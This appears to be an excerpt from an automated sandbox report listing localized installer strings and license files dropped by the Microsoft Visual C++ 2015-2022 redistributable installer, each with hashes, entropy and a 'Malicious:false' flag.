                                                                                                                                                                                                                                SHA-512:FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive | /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):12392
                                                                                                                                                                                                                                Entropy (8bit):5.192979871787938
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:2DDCA2866D76C850F68ACDFDB696D6DE
                                                                                                                                                                                                                                SHA1:C5076F10B0F0654CDE2C990DEEB2772F3CC4844B
                                                                                                                                                                                                                                SHA-256:28F63BAD9C2960395106011761993049546607F8A850D344D6A54042176BF03F
                                                                                                                                                                                                                                SHA-512:E3A3693B92873E0B42007616FF6916304EDC5C4F2EEE3E9276F87E86DD94C2BF6E1CF4E895CDF9A1AA0CAC0B381B8840EEE1F491123E901DEE75638B8BC5CE1B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil Tahoma;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBEDINGUNGEN\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Diese Lizenzbestimmungen stellen eine Vereinbarung zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem ihrer Affiliate-Partner) dar. Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b WENN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, VERF\'dcGEN SIE \'dcBER DIE NACHFOLGEND AUFGEF\'dcHRTEN RECHTE.\par....\pard{\pntext\f3\'B7\tab}{\*\pn\pnlvlblt\pnf3\pnindent360{\pntxtb\'B7}}\
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3379
                                                                                                                                                                                                                                Entropy (8bit):5.094097800535488
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:561F3F32DB2453647D1992D4D932E872
                                                                                                                                                                                                                                SHA1:109548642FB7C5CC0159BEDDBCF7752B12B264C0
                                                                                                                                                                                                                                SHA-256:8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
                                                                                                                                                                                                                                SHA-512:CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive | /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, unknown character set
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):12349
                                                                                                                                                                                                                                Entropy (8bit):5.108676965693909
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:A6E352E5804313CCDE3E4D5DDDDE122D
                                                                                                                                                                                                                                SHA1:834E3AAA07DC675589A9E5FCD23CE5586C2739E8
                                                                                                                                                                                                                                SHA-256:5C13A65870D770D1642A4259EECB436257CA39016A0500F747BE9C79BE0C7009
                                                                                                                                                                                                                                SHA-512:6578AC6467F61930BC1B20E404441725C63790C65AEC1ACE297429EAD15F50E68D5FE9CC1451AC86AE23DC1A7FE967650166293010D687785FB81FB4492B87C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil\fcharset177 Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\ltrpar\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Les pr\'e9sentes conditions de licence constituent un contrat entre Microsoft Corporation (ou en fonction de votre lieu de r\'e9sidence, l\f1\rquote\f0 un de ses affili\'e9s) et vous. Ils s\f1\rquote\f0 appliquent au logiciel vis\'e9 ci-dessus. Les termes s\f1\rquote\f0 appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\f1\rquote\f0 autres termes n\f1\rquote\f0 accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT D
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3366
                                                                                                                                                                                                                                Entropy (8bit):5.0912204406356905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:7B46AE8698459830A0F9116BC27DE7DF
                                                                                                                                                                                                                                SHA1:D9BB14D483B88996A591392AE03E245CAE19C6C3
                                                                                                                                                                                                                                SHA-256:704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
                                                                                                                                                                                                                                SHA-512:FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive | /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11440
                                                                                                                                                                                                                                Entropy (8bit):5.037988271709582
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:BC58AD6ABB16B982AEBADC121B37E706
                                                                                                                                                                                                                                SHA1:25E3E4127A643DB5DB2A0B62B02DE871359FAE42
                                                                                                                                                                                                                                SHA-256:70ECF23C03B66A2B18E173332586AFA8F00F91E02A80628F4F9CB2521E27F6AC
                                                                                                                                                                                                                                SHA-512:8340452CB5E196CB1D5DA6DBB3FA8872E519D7903A05331055370B4850D912674F0B6AF3D6E4F94248FE8135EB378EB36969821D711FE1624A04AF13BBE55D70
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONDIZIONI DI LICENZA SOFTWARE MICROSOFT\par..RUNTIME MICROSOFT VISUAL C++ 2015 - 2022 \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario. Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, tranne se accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3319
                                                                                                                                                                                                                                Entropy (8bit):5.019774955491369
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:D90BC60FA15299925986A52861B8E5D5
                                                                                                                                                                                                                                SHA1:FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
                                                                                                                                                                                                                                SHA-256:0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
                                                                                                                                                                                                                                SHA-512:11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive | /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):30228
                                                                                                                                                                                                                                Entropy (8bit):3.785116198512527
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:47C315C54B6F2078875119FA7A718499
                                                                                                                                                                                                                                SHA1:F650DDB5DF2AF2EE7555C410D034B37B9DFD055B
                                                                                                                                                                                                                                SHA-256:C3061A334BFD5F02B7085F8F454D5D3D97D477AF14BAB497BF31A7887BC90C5B
                                                                                                                                                                                                                                SHA-512:A0E4B0FCCCFDD93BAF133C2080403E8719E4A6984237F751BD883C0D3C52D818EFD00F8BA7726A2F645F66286305599403470F14D39EEDC526DDE59228A5F261
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset128 MS PGothic;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset134 SimSun;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67\f1 \f0\'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41\f1 \f0\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\f1\par..MICROSOFT VISUAL C++ 2015 - 2022 \f0\'83\'89\'83\'93\'83\'5e\'83\'43\'83\'80\f1\par..\b0\f0\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\'82\'cd\f2\'a1\'a2\f1 Microsoft Corporation\f2\'a3\'a8\f0\'82\'dc\'82\'bd\'82\'cd\'82\'a8\'8b\'71\'97\'6c\'82\'cc\'8f\'8a\'8d\'dd\'92\'6e\'82\'c9\'89\'9e\'82\'b6\'82\'bd\'8a\'d6\'98\'41\'89\'ef\'8e\'d0\f2\'a3\'a9\f0\'82\'c6\'82\'a8\'8b\'71\'97\'6c\'82\'c6\'82\'cc\'8c\'5f\'96\'f1\'82\'f0\'8d\'5c\'90\'ac\'82\'b5\'82\'dc\'82\'b7\f2\'a1\'a3\'b
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3959
                                                                                                                                                                                                                                Entropy (8bit):5.955167044943003
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:DC81ED54FD28FC6DB6F139C8DA1BDED6
                                                                                                                                                                                                                                SHA1:9C719C32844F78AAE523ADB8EE42A54D019C2B05
                                                                                                                                                                                                                                SHA-256:6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
                                                                                                                                                                                                                                SHA-512:FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ............ ......... .........................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):28393
                                                                                                                                                                                                                                Entropy (8bit):3.874126830110936
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:641D926354F001034CF3F2F3B0FF33DC
                                                                                                                                                                                                                                SHA1:5505107FFF6CF279769A82510276F61EA18637AE
                                                                                                                                                                                                                                SHA-256:3D4E9C165CBEAB829D608106F0E96450F839FFA8ADBD755F0B51867E89DA2AE0
                                                                                                                                                                                                                                SHA-512:B0339664434B096ABC26D600F7657919EF3689B4E0FDFD4EDD8E479859A51EF51BE8F05FA43E25567FFD6C1C2BCC6EF0D7A857B6D666D264C7783BAD3A383D0E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset129 Malgun Gothic;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'b0\'e8\'be\'e0\'bc\'ad\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 \f1\'b7\'b1\'c5\'b8\'c0\'d3\f0 \par..\b0\f1\'ba\'bb\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'b0\'e8\'be\'e0\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'b3\'aa\f0 )\f1\'b0\'fa\f0 \f1\'b1\'cd\'c7\'cf\f0 \f1\'b0\'a3\'bf\'a1\f0 \f1\'c3\'bc\'b0\'e1\'b5\'c7\'b4\'c2\f0 \f1\'b0\'e8\'be\'e0\'c0\'d4\'b4\'cf\'b4\'d9\f0 . \f1\'ba\'bb\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3249
                                                                                                                                                                                                                                Entropy (8bit):5.985100495461761
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:B3399648C2F30930487F20B50378CEC1
                                                                                                                                                                                                                                SHA1:CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
                                                                                                                                                                                                                                SHA-256:AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
                                                                                                                                                                                                                                SHA-512:C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive | /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13352
                                                                                                                                                                                                                                Entropy (8bit):5.359561719031494
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:F140FD8CA2C63A861D04310257C1B1DB
                                                                                                                                                                                                                                SHA1:7BF7EF763A1F80ECACA692908F8F0790A88C3CA1
                                                                                                                                                                                                                                SHA-256:6F94A99072061012C5626A6DD069809EC841D6E3102B48394D522A0C2E3AA2B5
                                                                                                                                                                                                                                SHA-512:A0BD65AF13CC11E41E5021DF0399E5D21B340EF6C9BBE9B1B56A1766F609CEB031F550A7A0439264B10D67A76A6403E41ABA49B3C9E347CAEDFE9AF0C5BE1EE6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA MICROSOFT\par..\f0 MICROSOFT VISUAL C++ \f1\'8cRODOWISKO URUCHOMIENIOWE 2015-2022 \par..\b0\f0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a Licencjobiorc\f1\'b9. Postanowienia te dotycz\'b9 oprogramowania okre\'9clonego powy\'bfej. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym tow
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3212
                                                                                                                                                                                                                                Entropy (8bit):5.268378763359481
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                                                                                                                                                                                SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                                                                                                                                                                                SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                                                                                                                                                                                SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive | /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10956
                                                                                                                                                                                                                                Entropy (8bit):5.086757849952268
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:9A8D2ACF07F3C01E5CBC461AB932D85B
                                                                                                                                                                                                                                SHA1:8781A298DCC14C18C6F6DB58B64F50B2FC6E338E
                                                                                                                                                                                                                                SHA-256:27891EEC899BE859E3B4D3B29247FC6B535D7E836DEF0329111C48741EC6E701
                                                                                                                                                                                                                                SHA-512:A60262A0C18E3BEF7C6D52F242153EBE891F676ED639F2DACFEBBAC86E70EEBF58AA95A7FE1A16E15A553C1BD3ECACCD8677EB9D2761CB79CB9A342C9B4252E2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..TEMPO DE EXECU\'c7\'c3O DO MICROSOFT VISUAL C++ 2015 - 2022 \par..\b0 Os presentes termos de licen\'e7a constituem um contrato firmado entre a Microsoft Corporation (ou, dependendo do local no qual voc\'ea esteja domiciliado, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pn
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
